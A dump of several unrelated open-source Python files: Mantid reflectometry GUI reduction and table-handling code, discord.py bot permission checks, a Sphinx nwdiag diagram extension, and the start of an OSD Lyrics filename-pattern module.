combineDataMulti(wkspBinned, outputwksp, overlapLow, overlapHigh, Qmin, Qmax, -dqq, 1, keep=True, scale_right=self.__scale_right) Qmin = min(getWorkspace(outputwksp).readX(0)) Qmax = max(getWorkspace(outputwksp).readX(0)) if canMantidPlot: stitched_graph = self.__graphs.get(outputwksp, None) stitched_graph = plotSpectrum(outputwksp, 0, True, window=stitched_graph, clearWindow=True) titl = groupGet(outputwksp, 'samp', 'run_title') stitched_graph.activeLayer().setTitle(titl) stitched_graph.activeLayer().setAxisScale(Layer.Left, 1e-8, 100.0, Layer.Log10) stitched_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10) self.__graphs[outputwksp] = stitched_graph def __name_trans(self, transrun): """ From a comma or colon separated string of run numbers construct an output workspace name for the transmission workspace that fits the form TRANS_{trans_1}_{trans_2} """ if bool(re.search("^(TRANS)", transrun)): # The user has deliberately tried to supply the transmission run directly return transrun else: split_trans = re.split(',|:', transrun) if len(split_trans) == 0: return None name = 'TRANS' for t in split_trans: name += '_' + str(t) return name def _do_run(self, runno, row, which): """ Run quick on the given run and row """ transrun = str(self.tableMain.item(row, (which * 5) + 2).text()) # Formulate a WS Name for the processed transmission run. 
transrun_named = self.__name_trans(transrun) # Look for existing transmission workspaces that match the name transmission_ws = None if mtd.doesExist(transrun_named): if isinstance(mtd[transrun_named], WorkspaceGroup): unit = mtd[transrun_named][0].getAxis(0).getUnit().unitID() else: unit = mtd[transrun_named].getAxis(0).getUnit().unitID() if unit == "Wavelength": logger.notice('Reusing transmission workspace ' + transrun_named) transmission_ws = mtd[transrun_named] angle_str = str(self.tableMain.item(row, which * 5 + 1).text()) if len(angle_str) > 0: angle = float(angle_str) else: angle = None loadedRun = runno if load_live_runs.is_live_run(runno): load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq, accumulation=self.live_method) wlam, wq, th, wqBinned = None, None, None, None # Only make a transmission workspace if we need one. if transrun and not transmission_ws: converter = ConvertToWavelength(transrun) size = converter.get_ws_list_size() out_ws_name = transrun_named if size == 1: trans1 = converter.get_workspace_from_list(0) transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1, OutputWorkspace=out_ws_name, Params=0.02, StartOverlap=10.0, EndOverlap=12.0, Version=1) elif size == 2: trans1 = converter.get_workspace_from_list(0) trans2 = converter.get_workspace_from_list(1) transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1, OutputWorkspace=out_ws_name, SecondTransmissionRun=trans2, Params=0.02, StartOverlap=10.0, EndOverlap=12.0, Version=1) else: raise RuntimeError("Up to 2 transmission runs can be specified. 
No more than that.") # Load the runs required ConvertToWavelength will deal with the transmission runs, while .to_workspace will deal with the run itself ws = ConvertToWavelength.to_workspace(loadedRun, ws_prefix="") if self.__alg_use: if self.tableMain.item(row, self.scale_col).text(): factor = float(self.tableMain.item(row, self.scale_col).text()) else: factor = 1.0 if self.tableMain.item(row, 15).text(): Qstep = float(self.tableMain.item(row, 15).text()) else: Qstep = None if len(self.tableMain.item(row, which * 5 + 3).text()) > 0: Qmin = float(self.tableMain.item(row, which * 5 + 3).text()) else: Qmin = None if len(self.tableMain.item(row, which * 5 + 4).text()) > 0: Qmax = float(self.tableMain.item(row, which * 5 + 4).text()) else: Qmax = None # If we're dealing with a workspace group, we'll manually map execution over each group member # We do this so we can get ThetaOut correctly (see ticket #10597 for why we can't at the moment) if isinstance(ws, WorkspaceGroup): wqGroupBinned = [] wqGroup = [] wlamGroup = [] thetaGroup = [] group_trans_ws = transmission_ws for i in range(0, ws.size()): # If the transmission workspace is a group, we'll use it pair-wise with the tof workspace group if isinstance(transmission_ws, WorkspaceGroup): group_trans_ws = transmission_ws[i] alg = AlgorithmManager.create("ReflectometryReductionOneAuto") alg.initialize() alg.setProperty("InputWorkspace", ws[i]) if group_trans_ws: alg.setProperty("FirstTransmissionRun", group_trans_ws) if angle is not None: alg.setProperty("ThetaIn", angle) alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned_' + str(i + 1)) alg.setProperty("OutputWorkspace", runno + '_IvsQ_' + str(i + 1)) alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam_' + str(i + 1)) alg.setProperty("ScaleFactor", factor) if Qstep is not None: alg.setProperty("MomentumTransferStep", Qstep) if Qmin is not None: alg.setProperty("MomentumTransferMin", Qmin) if Qmax is not None: 
alg.setProperty("MomentumTransferMax", Qmax) alg.execute() wqBinned = mtd[runno + '_IvsQ_binned_' + str(i + 1)] wq = mtd[runno + '_IvsQ_' + str(i + 1)] wlam = mtd[runno + '_IvsLam_' + str(i + 1)] th = alg.getProperty("ThetaIn").value wqGroupBinned.append(wqBinned) wqGroup.append(wq) wlamGroup.append(wlam) thetaGroup.append(th) wqBinned = GroupWorkspaces(InputWorkspaces=wqGroupBinned, OutputWorkspace=runno + '_IvsQ_binned') wq = GroupWorkspaces(InputWorkspaces=wqGroup, OutputWorkspace=runno + '_IvsQ') wlam = GroupWorkspaces(InputWorkspaces=wlamGroup, OutputWorkspace=runno + '_IvsLam') th = thetaGroup[0] else: alg = AlgorithmManager.create("ReflectometryReductionOneAuto") alg.initialize() alg.setProperty("InputWorkspace", ws) if transmission_ws: alg.setProperty("FirstTransmissionRun", transmission_ws) if angle is not None: alg.setProperty("ThetaIn", angle) alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned') alg.setProperty("OutputWorkspace", runno + '_IvsQ') alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam') alg.setProperty("ScaleFactor", factor) if Qstep is not None: alg.setProperty("MomentumTransferStep", Qstep) if Qmin is not None: alg.setProperty("MomentumTransferMin", Qmin) if Qmax is not None: alg.setProperty("MomentumTransferMax", Qmax) alg.execute() wqBinned = mtd[runno + '_IvsQ_binned'] wq = mtd[runno + '_IvsQ'] wlam = mtd[runno + '_IvsLam'] th = alg.getProperty("ThetaIn").value cleanup() else: wlam, wq, th = quick(loadedRun, trans=transmission_ws, theta=angle, tof_prefix="") if self.__group_tof_workspaces and not isinstance(ws, WorkspaceGroup): if "TOF" in mtd: tof_group = mtd["TOF"] if not tof_group.contains(loadedRun): tof_group.add(loadedRun) else: tof_group = GroupWorkspaces(InputWorkspaces=loadedRun, OutputWorkspace="TOF") if ':' in runno: runno = runno.split(':')[0] if ',' in runno: runno = runno.split(',')[0] if isinstance(wq, WorkspaceGroup): inst = wq[0].getInstrument() else: inst = wq.getInstrument() lmin = 
inst.getNumberParameter('LambdaMin')[0] lmax = inst.getNumberParameter('LambdaMax')[0] qmin = 4 * math.pi / lmax * math.sin(th * math.pi / 180) qmax = 4 * math.pi / lmin * math.sin(th * math.pi / 180) return th, qmin, qmax, wlam, wqBinned, wq def _save_table_contents(self, filename): """ Save the contents of the table """ try: writer = csv.writer(open(filename, "wb")) for row in range(self.tableMain.rowCount()): rowtext = [] for column in range(self.tableMain.columnCount() - 2): rowtext.append(self.tableMain.item(row, column).text()) if len(rowtext) > 0: writer.writerow(rowtext) self.current_table = filename logger.notice("Saved file to " + filename) self.mod_flag = False except: return False self.mod_flag = False return True def _save(self, failsave=False): """ Save the table, showing no interface if not necessary. This also provides the failing save functionality. """ filename = '' if failsave: # this is an emergency autosave as the program is failing logger.error( "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.") msgBox = QtGui.QMessageBox() msgBox.setText( "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.\n" "Please check the log for details.") msgBox.setStandardButtons(QtGui.QMessageBox.Ok) msgBox.setIcon(QtGui.QMessageBox.Critical) msgBox.setDefaultButton(QtGui.QMessageBox.Ok) msgBox.setEscapeButton(QtGui.QMessageBox.Ok) msgBox.exec_() import datetime failtime = datetime.datetime.today().strftime('%Y-%m-%d_%H-%M-%S') if self.current_table: filename = self.current_table.rsplit('.', 1)[0] + "_recovered_" + failtime + ".tbl" else: mantidDefault = config['defaultsave.directory'] if os.path.exists(mantidDefault): filename = os.path.join(mantidDefault, "mantid_reflectometry_recovered_" + failtime + ".tbl") else: import tempfile tempDir = tempfile.gettempdir() filename = os.path.join(tempDir, "mantid_reflectometry_recovered_" + failtime + ".tbl") else: # this is 
a save-on-quit or file->save if self.current_table: filename = self.current_table else: saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table") saveDialog.setFileMode(QtGui.QFileDialog.AnyFile) saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)") saveDialog.setDefaultSuffix("tbl") saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave) if saveDialog.exec_(): filename = saveDialog.selectedFiles()[0] else: return False return self._save_table_contents(filename) def _save_as(self): """ show the save as dialog and save to a .tbl file with that name """ saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table") saveDialog.setFileMode(QtGui.QFileDialog.AnyFile) saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)") saveDialog.setDefaultSuffix("tbl") saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave) if saveDialog.exec_(): filename = saveDialog.selectedFiles()[0] self._save_table_contents(filename) def _load_table(self): """ Load a .tbl file from disk """ self.loading = True loadDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Open Table") loadDialog.setFileMode(QtGui.QFileDialog.ExistingFile) loadDialog.setNameFilter("Table Files (*.tbl);;All files (*)") if loadDialog.exec_(): try: # before loading make sure you give them a chance to save if self.mod_flag: ret, _saved = self._save_check() if ret == QtGui.QMessageBox.RejectRole: # if they hit cancel abort the load self.loading = False return self._reset_table() filename = loadDialog.selectedFiles()[0] self.current_table = filename reader = csv.reader(open(filename, "rb")) row = 0 for line in reader: if row < 100: for column in range(self.tableMain.columnCount() - 2): item = QtGui.QTableWidgetItem() item.setText(line[column]) self.tableMain.setItem(row, column, item) row = row + 1 except: logger.error('Could not load file: ' + str(filename) + '. 
File not found or unable to read from file.') self.loading = False self.mod_flag = False def _reload_table(self): """ Reload the last loaded file from disk, replacing anything in the table already """ self.loading = True filename = self.current_table if filename: if self.mod_flag: msgBox = QtGui.QMessageBox() msgBox.setText( "The table has been modified. Are you sure you want to reload the table and lose your changes?") msgBox.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No) msgBox.setIcon(QtGui.QMessageBox.Question) msgBox.setDefaultButton(QtGui.QMessageBox.Yes) msgBox.setEscapeButton(QtGui.QMessageBox.No) ret = msgBox.exec_() if ret == QtGui.QMessageBox.No: # if they hit No abort the reload self.loading = False return try: self._reset_table() reader = csv.reader(open(filename, "rb")) row = 0 for line in reader: if row < 100: for column in range(self.tableMain.columnCount() - 2): item = QtGui.QTableWidgetItem() item.setText(line[column]) self.tableMain.setItem(row, column, item) row = row + 1 self.mod_flag = False except: logger.error('Could not load file: ' + str(filename) + '. 
File not found or unable to read from file.') else: logger.notice('No file in table to reload.') self.loading = False def _save_workspaces(self): """ Shows the export dialog for saving workspaces to non mantid formats """ try: Dialog = QtGui.QDialog() u = Ui_SaveWindow() u.setupUi(Dialog) Dialog.exec_() except Exception as ex: logger.notice("Could not open save workspace dialog") logger.notice(str(ex)) def _options_dialog(self): """ Shows the dialog for setting options regarding live data """ try: dialog_controller = ReflOptions(def_method=self.live_method, def_freq=self.live_freq, def_alg_use=self.__alg_use, def_icat_download=self.__icat_download, def_group_tof_workspaces=self.__group_tof_workspaces, def_stitch_right=self.__scale_right) if dialog_controller.exec_(): # Fetch the settings back off the controller self.live_freq = dialog_controller.frequency() self.live_method = dialog_controller.method() self.__alg_use = dialog_controller.useAlg() self.__icat_download = dialog_controller.icatDownload() self.__group_tof_workspaces = dialog_controller.groupTOFWorkspaces() self.__scale_right = dialog_controller.stitchRight() # Persist the settings settings = QtCore.QSettings() settings.beginGroup(self.__live_data_settings) settings.setValue(self.__live_data_frequency_key, self.live_freq) settings.setValue(self.__live_data_method_key, self.live_method) settings.endGroup() settings.beginGroup(self.__generic_settings) settings.setValue(self.__ads_use_key, self.__alg_use) settings.setValue(self.__icat_download_key, self.__icat_download) settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces) settings.setValue(self.__stitch_right_key, self.__scale_right) settings.endGroup() del settings except Exception as ex: logger.notice("Problem opening options dialog or problem retrieving values from dialog") logger.notice(str(ex)) def _choose_columns(self): """ shows the choose columns dialog for hiding and revealing of columns """ try: dialog = 
ReflChoose(self.shown_cols, self.tableMain) if dialog.exec_(): settings = QtCore.QSettings() settings.beginGroup(self.__column_settings) for key, value in dialog.visiblestates.iteritems(): self.shown_cols[key] = value settings.setValue(str(key), value) if value: self.tableMain.showColumn(key) else: self.tableMain.hideColumn(key) settings.endGroup() del settings except Exception as ex: logger.notice("Could not open choose columns dialog") logger.notice(str(ex)) def _show_help(self): """ Launches the wiki page for this interface """ import webbrowser webbrowser.open('http://www.mantidproject.org/ISIS_Reflectometry_GUI') def getLogValue(wksp, field=''): """ returns the last value from a sample log """ ws = getWorkspace(wksp) log = ws.getRun().getLogData(field).value if isinstance(log, int) or isinstance(log, str): return log else: return log[-1] def getWorkspace(wksp, report_error=True): """ Gets the first workspace associated with the given string. Does not load. """ if isinstance(wksp, Workspace): return wksp elif isinstance(wksp, str): exists = mtd.doesExist(wksp) if not exists: if report_error: logger.error("Unable to get workspace: " + str(wksp)) return exists # Doesn't exist else: return exists # Doesn't exist elif isinstance(mtd[wksp], WorkspaceGroup): wout = mtd[wksp][0] else: wout = mtd[wksp] return wout
Jonqora/whiskers
checks.py
# Permission and context predicates used as discord.py command checks.
#
# Each ``check_*`` function is a plain predicate over a command ``ctx``;
# each corresponding factory (``raidset()``, ``citychannel()``, ...) wraps
# its predicate in ``commands.check`` so cogs can use it as a decorator.
# All predicates return an explicit boolean (or a boolean-ish value from a
# delegate predicate); they never raise on missing configuration — a
# missing key in ``ctx.bot.server_dict`` simply means "check fails".

from discord.ext import commands
import discord.utils


def is_owner_check(ctx):
    """Return True if the message author is the configured bot master."""
    author = str(ctx.message.author)
    owner = ctx.bot.config['master']
    return author == owner


def is_owner():
    """Command check: only the bot owner may run the command."""
    return commands.check(is_owner_check)


def check_permissions(ctx, perms):
    """Return True if the author has every permission named in *perms*.

    *perms* maps permission attribute names to required boolean values.
    An empty mapping never matches.
    """
    # NOTE: owner bypass intentionally disabled; kept for reference.
    # if is_owner_check(ctx):
    #     return True
    if not perms:
        return False
    ch = ctx.message.channel
    author = ctx.message.author
    resolved = ch.permissions_for(author)
    return all(getattr(resolved, name, None) == value for name, value in perms.items())


def role_or_permissions(ctx, check, **perms):
    """Return True if the author satisfies *perms* or has a role matching *check*."""
    if check_permissions(ctx, perms):
        return True
    ch = ctx.message.channel
    author = ctx.message.author
    if ch.is_private:
        return False  # can't have roles in PMs
    role = discord.utils.find(check, author.roles)
    return role is not None


def serverowner_or_permissions(**perms):
    """Command check: the server owner, or any author satisfying *perms*."""
    def predicate(ctx):
        owner = ctx.message.server.owner
        if ctx.message.author.id == owner.id:
            return True
        return check_permissions(ctx, perms)
    return commands.check(predicate)


def serverowner():
    """Command check: only the server owner may run the command."""
    return serverowner_or_permissions()


def check_wantchannel(ctx):
    """True if invoked in one of the server's configured 'want' channels."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        want_channels = ctx.bot.server_dict[server]['want_channel_list']
    except KeyError:
        return False
    # Explicit boolean instead of the old implicit ``None`` fall-through.
    return channel in want_channels


def check_citychannel(ctx):
    """True if invoked in a configured city channel (matched by name)."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel.name
    server = ctx.message.server
    try:
        city_channels = ctx.bot.server_dict[server]['city_channels'].keys()
    except KeyError:
        return False
    return channel in city_channels


def check_raidchannel(ctx):
    """True if invoked in an existing raid channel."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        raid_channels = ctx.bot.server_dict[server]['raidchannel_dict'].keys()
    except KeyError:
        return False
    return channel in raid_channels


def check_eggchannel(ctx):
    """True if the current raid channel is of type 'egg'."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        # Renamed from ``type`` to avoid shadowing the builtin.
        channel_type = ctx.bot.server_dict[server]['raidchannel_dict'][channel]['type']
    except KeyError:
        return False
    return channel_type == 'egg'


def check_raidactive(ctx):
    """True if the current raid channel is marked active."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        return ctx.bot.server_dict[server]['raidchannel_dict'][channel]['active']
    except KeyError:
        return False


def check_raidset(ctx):
    """True if raid reporting is enabled on this server."""
    if ctx.message.server is None:
        return False
    server = ctx.message.server
    try:
        return ctx.bot.server_dict[server]['raidset']
    except KeyError:
        return False


def check_wildset(ctx):
    """True if wild reporting is enabled on this server."""
    if ctx.message.server is None:
        return False
    server = ctx.message.server
    try:
        return ctx.bot.server_dict[server]['wildset']
    except KeyError:
        return False


def check_wantset(ctx):
    """True if 'want' subscriptions are enabled on this server."""
    if ctx.message.server is None:
        return False
    server = ctx.message.server
    try:
        return ctx.bot.server_dict[server]['wantset']
    except KeyError:
        return False


def check_teamset(ctx):
    """True if team assignment is enabled on this server."""
    if ctx.message.server is None:
        return False
    server = ctx.message.server
    try:
        return ctx.bot.server_dict[server]['team']
    except KeyError:
        return False


def teamset():
    """Command check: team assignment must be enabled."""
    def predicate(ctx):
        return check_teamset(ctx)
    return commands.check(predicate)


def wantset():
    """Command check: 'want' subscriptions must be enabled."""
    def predicate(ctx):
        return check_wantset(ctx)
    return commands.check(predicate)


def wildset():
    """Command check: wild reporting must be enabled."""
    def predicate(ctx):
        return check_wildset(ctx)
    return commands.check(predicate)


def raidset():
    """Command check: raid reporting must be enabled."""
    def predicate(ctx):
        return check_raidset(ctx)
    return commands.check(predicate)


def citychannel():
    """Command check: must be invoked in a city channel."""
    def predicate(ctx):
        return check_citychannel(ctx)
    return commands.check(predicate)


def wantchannel():
    """Command check: 'want' enabled AND invoked in a want channel."""
    def predicate(ctx):
        if check_wantset(ctx):
            return check_wantchannel(ctx)
        return False
    return commands.check(predicate)


def raidchannel():
    """Command check: must be invoked in a raid channel."""
    def predicate(ctx):
        return check_raidchannel(ctx)
    return commands.check(predicate)


def notraidchannel():
    """Command check: must NOT be invoked in a raid channel."""
    def predicate(ctx):
        return not check_raidchannel(ctx)
    return commands.check(predicate)


def activeraidchannel():
    """Command check: must be invoked in an *active* raid channel."""
    def predicate(ctx):
        if check_raidchannel(ctx):
            return check_raidactive(ctx)
        return False
    return commands.check(predicate)


def cityraidchannel():
    """Command check: a raid channel or a city channel both qualify."""
    def predicate(ctx):
        return check_raidchannel(ctx) or check_citychannel(ctx)
    return commands.check(predicate)


def cityeggchannel():
    """Command check: an egg-type raid channel, or any city channel."""
    def predicate(ctx):
        if check_raidchannel(ctx):
            # Inside a raid channel it must specifically be an egg channel.
            return check_eggchannel(ctx)
        return check_citychannel(ctx)
    return commands.check(predicate)
bboalimoe/ndn-cache-policy
docs/sphinx-contrib/nwdiag/sphinxcontrib/nwdiag.py
# -*- coding: utf-8 -*- """ nwdiag.sphinx_ext ~~~~~~~~~~~~~~~~~~~~ Allow nwdiag-formatted diagrams to be included in Sphinx-generated documents inline. :copyright: Copyright 2010 by Takeshi Komiya. :license: BSDL. """ from __future__ import absolute_import import os import re import traceback from collections import namedtuple from docutils import nodes from sphinx import addnodes from sphinx.util.osutil import ensuredir import nwdiag.utils.rst.nodes import nwdiag.utils.rst.directives from blockdiag.utils.bootstrap import detectfont from blockdiag.utils.compat import u, string_types from blockdiag.utils.fontmap import FontMap # fontconfig; it will be initialized on `builder-inited` event. fontmap = None class nwdiag_node(nwdiag.utils.rst.nodes.nwdiag): def to_drawer(self, image_format, builder, **kwargs): if 'filename' in kwargs: filename = kwargs.pop('filename') else: filename = self.get_abspath(image_format, builder) antialias = builder.config.nwdiag_antialias image = super(nwdiag_node, self).to_drawer(image_format, filename, fontmap, antialias=antialias, **kwargs) for node in image.diagram.traverse_nodes(): node.href = resolve_reference(builder, node.href) return image def get_relpath(self, image_format, builder): options = dict(antialias=builder.config.nwdiag_antialias, fontpath=builder.config.nwdiag_fontpath, fontmap=builder.config.nwdiag_fontmap, format=image_format) outputdir = getattr(builder, 'imgpath', builder.outdir) return os.path.join(outputdir, self.get_path(**options)) def get_abspath(self, image_format, builder): options = dict(antialias=builder.config.nwdiag_antialias, fontpath=builder.config.nwdiag_fontpath, fontmap=builder.config.nwdiag_fontmap, format=image_format) if hasattr(builder, 'imgpath'): outputdir = os.path.join(builder.outdir, '_images') else: outputdir = builder.outdir path = os.path.join(outputdir, self.get_path(**options)) ensuredir(os.path.dirname(path)) return path class Nwdiag(nwdiag.utils.rst.directives.NwdiagDirective): 
node_class = nwdiag_node def node2image(self, node, diagram): return node def resolve_reference(builder, href): if href is None: return None pattern = re.compile(u("^:ref:`(.+?)`"), re.UNICODE) matched = pattern.search(href) if matched is None: return href else: refid = matched.group(1) domain = builder.env.domains['std'] node = addnodes.pending_xref(refexplicit=False) xref = domain.resolve_xref(builder.env, builder.current_docname, builder, 'ref', refid, node, node) if xref: if 'refid' in xref: return "#" + xref['refid'] else: return xref['refuri'] else: builder.warn('undefined label: %s' % refid) return None def html_render_svg(self, node): image = node.to_drawer('SVG', self.builder, filename=None, nodoctype=True) image.draw() if 'align' in node['options']: align = node['options']['align'] self.body.append('<div align="%s" class="align-%s">' % (align, align)) self.context.append('</div>\n') else: self.body.append('<div>') self.context.append('</div>\n') # reftarget for node_id in node['ids']: self.body.append('<span id="%s"></span>' % node_id) # resize image size = image.pagesize().resize(**node['options']) self.body.append(image.save(size)) self.context.append('') def html_render_clickablemap(self, image, width_ratio, height_ratio): href_nodes = [node for node in image.nodes if node.href] if not href_nodes: return self.body.append('<map name="map_%d">' % id(image)) for node in href_nodes: x1, y1, x2, y2 = image.metrics.cell(node) x1 *= width_ratio x2 *= width_ratio y1 *= height_ratio y2 *= height_ratio areatag = '<area shape="rect" coords="%s,%s,%s,%s" href="%s">' % (x1, y1, x2, y2, node.href) self.body.append(areatag) self.body.append('</map>') def html_render_png(self, node): image = node.to_drawer('PNG', self.builder) if not os.path.isfile(image.filename): image.draw() image.save() # align if 'align' in node['options']: align = node['options']['align'] self.body.append('<div align="%s" class="align-%s">' % (align, align)) self.context.append('</div>\n') else: 
    # (continuation of html_render_png, whose opening lines are outside this
    # chunk) -- wrap the rendered PNG in a <div>, optionally link to the
    # full-size original, then emit the <img> tag itself.
    self.body.append('<div>')
    self.context.append('</div>')

    # link to original image
    relpath = node.get_relpath('PNG', self.builder)
    if 'width' in node['options'] or 'height' in node['options'] or 'scale' in node['options']:
        # the displayed image is resized, so make it a link to the original
        self.body.append('<a class="reference internal image-reference" href="%s">' % relpath)
        self.context.append('</a>')
    else:
        self.context.append('')

    # <img> tag
    original_size = image.pagesize()
    resized = original_size.resize(**node['options'])
    img_attr = dict(src=relpath,
                    width=resized.width,
                    height=resized.height)
    if any(node.href for node in image.nodes):
        # at least one diagram node carries a hyperlink: emit a client-side
        # image map scaled to the resized image
        img_attr['usemap'] = "#map_%d" % id(image)
        width_ratio = float(resized.width) / original_size.width
        height_ratio = float(resized.height) / original_size.height
        html_render_clickablemap(self, image, width_ratio, height_ratio)
    if 'alt' in node['options']:
        img_attr['alt'] = node['options']['alt']
    self.body.append(self.starttag(node, 'img', '', empty=True, **img_attr))


def html_visit_nwdiag(self, node):
    """Render an nwdiag node for the HTML builder (SVG or PNG).

    On failure the node is skipped and a builder warning is emitted instead
    of aborting the build.
    """
    try:
        image_format = get_image_format_for(self.builder)
        if image_format.upper() == 'SVG':
            html_render_svg(self, node)
        else:
            html_render_png(self, node)
    except UnicodeEncodeError:
        # typically caused by a font that cannot encode the diagram text
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()

        msg = ("nwdiag error: UnicodeEncodeError caught "
               "(check your font settings)")
        self.builder.warn(msg)
        raise nodes.SkipNode
    except Exception as exc:
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()

        self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
        raise nodes.SkipNode


def html_depart_nwdiag(self, node):
    """Close the tags opened by the corresponding visit function."""
    # two entries were pushed in html_render_png/svg: the </a> (or '') and
    # the closing </div>
    self.body.append(self.context.pop())
    self.body.append(self.context.pop())


def get_image_format_for(builder):
    """Return the output image format ('PNG', 'PDF' or 'SVG') for *builder*.

    Raises ValueError for an unknown format and ImportError when PDF output
    is requested but reportlab is not installed.
    """
    if builder.format == 'html':
        image_format = builder.config.nwdiag_html_image_format.upper()
    elif builder.format == 'latex':
        # nwdiag_tex_image_format is the deprecated spelling; it wins when set
        if builder.config.nwdiag_tex_image_format:
            image_format = builder.config.nwdiag_tex_image_format.upper()
        else:
            image_format = builder.config.nwdiag_latex_image_format.upper()
    else:
        image_format = 'PNG'

    if image_format.upper() not in ('PNG', 'PDF', 'SVG'):
        raise ValueError('unknown format: %s' % image_format)

    if image_format.upper() == 'PDF':
        try:
            import reportlab  # NOQA: importing test
        except ImportError:
            raise ImportError('Could not output PDF format. Install reportlab.')

    return image_format


def on_builder_inited(self):
    """'builder-inited' hook: warn about deprecated options and set up fonts."""
    # show deprecated message
    if self.builder.config.nwdiag_tex_image_format:
        self.builder.warn('nwdiag_tex_image_format is deprecated. Use nwdiag_latex_image_format.')

    # initialize fontmap
    global fontmap
    try:
        fontmappath = self.builder.config.nwdiag_fontmap
        fontmap = FontMap(fontmappath)
    except:
        # NOTE(review): bare except deliberately falls back to the default
        # font map on any error (missing/invalid file)
        fontmap = FontMap(None)

    try:
        fontpath = self.builder.config.nwdiag_fontpath
        if isinstance(fontpath, string_types):
            fontpath = [fontpath]

        if fontpath:
            config = namedtuple('Config', 'font')(fontpath)
            fontpath = detectfont(config)
            fontmap.set_default_font(fontpath)
    except:
        # NOTE(review): bare except -- font detection is best-effort only
        pass


def on_doctree_resolved(self, doctree, docname):
    """'doctree-resolved' hook for non-HTML builders.

    Renders every nwdiag node to an image file and replaces the node with a
    regular docutils image node; failing nodes are dropped with a warning.
    """
    if self.builder.format == 'html':
        # HTML rendering happens later, in the visit/depart functions
        return

    try:
        image_format = get_image_format_for(self.builder)
    except Exception as exc:
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()

        self.builder.warn('nwdiag error: %s' % exc)
        # the format is unusable: strip all diagram nodes from the tree
        for node in doctree.traverse(nwdiag_node):
            node.parent.remove(node)

        return

    for node in doctree.traverse(nwdiag_node):
        try:
            relfn = node.get_relpath(image_format, self.builder)

            image = node.to_drawer(image_format, self.builder)
            # only draw when the file is not already cached on disk
            if not os.path.isfile(image.filename):
                image.draw()
                image.save()

            image = nodes.image(uri=image.filename, candidates={'*': relfn}, **node['options'])
            node.parent.replace(node, image)
        except Exception as exc:
            if self.builder.config.nwdiag_debug:
                traceback.print_exc()

            self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
            node.parent.remove(node)


def setup(app):
    """Sphinx extension entry point: register node, directive and options."""
    app.add_node(nwdiag_node,
                 html=(html_visit_nwdiag, html_depart_nwdiag))
    app.add_directive('nwdiag', Nwdiag)
    app.add_config_value('nwdiag_fontpath', None, 'html')
    app.add_config_value('nwdiag_fontmap', None, 'html')
    app.add_config_value('nwdiag_antialias', False, 'html')
    app.add_config_value('nwdiag_debug', False, 'html')
    app.add_config_value('nwdiag_html_image_format', 'PNG', 'html')
    app.add_config_value('nwdiag_tex_image_format', None, 'html')  # backward compatibility for 0.6.1
    app.add_config_value('nwdiag_latex_image_format', 'PNG', 'html')
    app.connect("builder-inited", on_builder_inited)
    app.connect("doctree-resolved", on_doctree_resolved)
ihacklog/osdlyrics
python/pattern.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Tiger Soldier
#
# This file is part of OSD Lyrics.
#
# OSD Lyrics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OSD Lyrics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OSD Lyrics.  If not, see <http://www.gnu.org/licenses/>.
#/

import consts
import urlparse
import urllib
import os.path

from errors import PatternException

# Candidate metadata names for each pattern tag.  The first name is the
# canonical one (used in error messages); later names are accepted as
# fall-backs -- e.g. plain dicts commonly use 'tracknumber' where the
# Metadata object exposes 'tracknum'.
_TAG_KEYS = {'t': ('title',),
             'p': ('artist',),
             'a': ('album',),
             'n': ('tracknum', 'tracknumber'),
             }


def _metadata_value(metadata, names):
    """Return the first non-empty value for any of ``names`` in ``metadata``.

    ``metadata`` may be a mapping (looked up as ``metadata[name]``) or an
    object exposing the values as attributes (``metadata.name``).  This keeps
    the documented dict interface and the attribute-style Metadata object
    both working.  Returns ``None`` when no candidate yields a value.
    """
    for name in names:
        try:
            value = metadata[name]
        except (TypeError, KeyError):
            # not a mapping, or the key is absent: fall back to attributes
            value = getattr(metadata, name, None)
        if value:
            return value
    return None


def expand_file(pattern, metadata):
    """
    Expands the pattern to a file name according to the infomation of a music

    The following are supported place holder in the pattern:

     - %t: Title of the track. 'title' in metadata
     - %p: Performer (artist) of the music. 'artist' in metadata
     - %a: Album of the music. 'album' in metadata
     - %n: Track number of the music. 'tracknumber' in metadata
     - %f: Filename without extension of the music. 'location' in metadata.
     - %%: The `%' punctuation

    Arguments:
     - `pattern`: The pattern to expand.
     - `metadata`: A dict representing metadata. Useful keys are listed above.

    If the pattern cannot be expand, raise an PatternException. Otherwise return
    the expended pattern.

    >>> metadata = {'artist': 'Foo',
